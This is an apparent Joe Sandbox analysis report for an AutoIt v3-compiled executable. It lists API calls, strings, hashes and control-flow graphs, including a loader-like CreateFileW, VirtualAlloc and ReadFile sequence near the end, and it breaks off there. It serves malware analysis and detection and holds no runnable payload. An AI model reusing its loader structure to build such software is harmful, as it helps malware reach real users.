                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                                  • API String ID: 3948761352-1609664196
                                                                                                                  • Opcode ID: b362ff0480f0ff0225f8e4dbf72b30760a6ebb43bcd2e9089b565cca71d3b216
                                                                                                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                  • Opcode Fuzzy Hash: b362ff0480f0ff0225f8e4dbf72b30760a6ebb43bcd2e9089b565cca71d3b216
                                                                                                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                  • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                  • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                  • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                  • _wcscat.LIBCMT ref: 00427541
                                                                                                                  • _wcslen.LIBCMT ref: 00427551
                                                                                                                  • _wcslen.LIBCMT ref: 00427562
                                                                                                                  • _wcscat.LIBCMT ref: 0042757C
                                                                                                                  • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                  • String ID: Include$\
                                                                                                                  • API String ID: 3173733714-3429789819
                                                                                                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • _fseek.LIBCMT ref: 0045292B
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                  • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                  • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                  • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                  • _fseek.LIBCMT ref: 004529BF
                                                                                                                  • _malloc.LIBCMT ref: 004529CA
                                                                                                                  • _malloc.LIBCMT ref: 004529D6
                                                                                                                  • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                  • _free.LIBCMT ref: 00452A17
                                                                                                                  • _free.LIBCMT ref: 00452A20
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1255752989-0
                                                                                                                  • Opcode ID: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                                                                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                  • Opcode Fuzzy Hash: a26cdbb87b8a4757d36a46659d538ef3d0929563a566a4a09478a2d1b1ee3278
                                                                                                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                  • String ID: FILE
                                                                                                                  • API String ID: 3888824918-3121273764
                                                                                                                  • Opcode ID: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                                                                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                  • Opcode Fuzzy Hash: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                                                                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(009750B8,000000FF,00000000), ref: 00410552
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                  • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                  • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                    • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009750B8,000000FF,00000000), ref: 00410552
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _malloc
                                                                                                                  • String ID: Default
                                                                                                                  • API String ID: 1579825452-753088835
                                                                                                                  • Opcode ID: a4cbf5b63b15695533c2bd37df170878d57881afc59e4586d08af379a3f1da61
                                                                                                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                  • Opcode Fuzzy Hash: a4cbf5b63b15695533c2bd37df170878d57881afc59e4586d08af379a3f1da61
                                                                                                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1237 40f5c0-40f5cf call 422240 1240 40f5d0-40f5e8 1237->1240 1240->1240 1241 40f5ea-40f613 call 413650 call 410e60 1240->1241 1246 40f614-40f633 call 414d04 1241->1246 1249 40f691 1246->1249 1250 40f635-40f63c 1246->1250 1253 40f696-40f69c 1249->1253 1251 40f660-40f674 call 4150d1 1250->1251 1252 40f63e 1250->1252 1257 40f679-40f67c 1251->1257 1254 40f640 1252->1254 1256 40f642-40f650 1254->1256 1258 40f652-40f655 1256->1258 1259 40f67e-40f68c 1256->1259 1257->1246 1260 40f65b-40f65e 1258->1260 1261 425d1e-425d3e call 4150d1 call 414d04 1258->1261 1262 40f68e-40f68f 1259->1262 1263 40f69f-40f6ad 1259->1263 1260->1251 1260->1254 1274 425d43-425d5f call 414d30 1261->1274 1262->1258 1264 40f6b4-40f6c2 1263->1264 1265 40f6af-40f6b2 1263->1265 1267 425d16 1264->1267 1268 40f6c8-40f6d6 1264->1268 1265->1258 1267->1261 1270 425d05-425d0b 1268->1270 1271 40f6dc-40f6df 1268->1271 1270->1256 1273 425d11 1270->1273 1271->1258 1273->1267 1274->1253
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                  • String ID: AU3!$EA06
                                                                                                                  • API String ID: 1268643489-2658333250
                                                                                                                  • Opcode ID: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                                                                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                  • Opcode Fuzzy Hash: b86aa73d20968581af46561266e5cfc6af67d3fa52a8a8a42fa2f0538c569cc0
                                                                                                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1277 401100-401111 1278 401113-401119 1277->1278 1279 401179-401180 1277->1279 1280 401144-40114a 1278->1280 1281 40111b-40111e 1278->1281 1279->1278 1282 401182 1279->1282 1285 401184-40118e call 401250 1280->1285 1286 40114c-40114f 1280->1286 1281->1280 1284 401120-401126 1281->1284 1283 40112c-401141 DefWindowProcW 1282->1283 1284->1283 1288 42b038-42b03f 1284->1288 1291 401193-40119a 1285->1291 1289 401151-401157 1286->1289 1290 40119d 1286->1290 1288->1283 1296 42b045-42b059 call 401000 call 40e0c0 1288->1296 1294 401219-40121f 1289->1294 1295 40115d 1289->1295 1292 4011a3-4011a9 1290->1292 1293 42afb4-42afc5 call 40f190 1290->1293 1292->1284 1297 4011af 1292->1297 1293->1291 1294->1284 1300 401225-42b06d call 468b0e 1294->1300 1298 401163-401166 1295->1298 1299 42b01d-42b024 1295->1299 1296->1283 1297->1284 1304 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1297->1304 1305 4011db-401202 SetTimer RegisterWindowMessageW 1297->1305 1307 42afe9-42b018 call 40f190 call 401a50 1298->1307 1308 40116c-401172 1298->1308 1299->1283 1306 42b02a-42b033 call 4370f4 1299->1306 1300->1291 1305->1291 1315 401204-401216 CreatePopupMenu 1305->1315 1306->1283 1307->1283 1308->1284 1317 401174-42afde call 45fd57 1308->1317 1317->1283 1328 42afe4 1317->1328 1328->1291
                                                                                                                  APIs
                                                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                  • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                  • String ID: TaskbarCreated
                                                                                                                  • API String ID: 129472671-2362178303
                                                                                                                  • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                  • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1329 4115d7-4115df 1330 4115ee-4115f9 call 4135bb 1329->1330 1333 4115e1-4115ec call 411988 1330->1333 1334 4115fb-4115fc 1330->1334 1333->1330 1337 4115fd-41160e 1333->1337 1338 411610-41163b call 417fc0 call 41130a 1337->1338 1339 41163c-411656 call 4180af call 418105 1337->1339 1338->1339
                                                                                                                  APIs
                                                                                                                  • _malloc.LIBCMT ref: 004115F1
                                                                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                  • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                  • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                  • String ID: ,*H$4*H$@fI
                                                                                                                  • API String ID: 615853336-1459471987
                                                                                                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1348 2e425d0-2e4267e call 2e40000 1351 2e42685-2e426ab call 2e434e0 CreateFileW 1348->1351 1354 2e426b2-2e426c2 1351->1354 1355 2e426ad 1351->1355 1362 2e426c4 1354->1362 1363 2e426c9-2e426e3 VirtualAlloc 1354->1363 1356 2e427fd-2e42801 1355->1356 1357 2e42843-2e42846 1356->1357 1358 2e42803-2e42807 1356->1358 1364 2e42849-2e42850 1357->1364 1360 2e42813-2e42817 1358->1360 1361 2e42809-2e4280c 1358->1361 1365 2e42827-2e4282b 1360->1365 1366 2e42819-2e42823 1360->1366 1361->1360 1362->1356 1367 2e426e5 1363->1367 1368 2e426ea-2e42701 ReadFile 1363->1368 1369 2e428a5-2e428ba 1364->1369 1370 2e42852-2e4285d 1364->1370 1373 2e4282d-2e42837 1365->1373 1374 2e4283b 1365->1374 1366->1365 1367->1356 1375 2e42703 1368->1375 1376 2e42708-2e42748 VirtualAlloc 1368->1376 1371 2e428bc-2e428c7 VirtualFree 1369->1371 1372 2e428ca-2e428d2 1369->1372 1377 2e42861-2e4286d 1370->1377 1378 2e4285f 1370->1378 1371->1372 1373->1374 1374->1357 1375->1356 1381 2e4274f-2e4276a call 2e43730 1376->1381 1382 2e4274a 1376->1382 1379 2e42881-2e4288d 1377->1379 1380 2e4286f-2e4287f 1377->1380 1378->1369 1384 2e4288f-2e42898 1379->1384 1385 2e4289a-2e428a0 1379->1385 1383 2e428a3 1380->1383 1388 2e42775-2e4277f 1381->1388 1382->1356 1383->1364 1384->1383 1385->1383 1389 2e42781-2e427b0 call 2e43730 1388->1389 1390 2e427b2-2e427c6 call 2e43540 1388->1390 1389->1388 1396 2e427c8 1390->1396 1397 2e427ca-2e427ce 1390->1397 1396->1356 1398 2e427d0-2e427d4 CloseHandle 1397->1398 1399 2e427da-2e427de 1397->1399 1398->1399 1400 2e427e0-2e427eb VirtualFree 1399->1400 1401 2e427ee-2e427f7 1399->1401 1400->1401 1401->1351 1401->1356
                                                                                                                  APIs
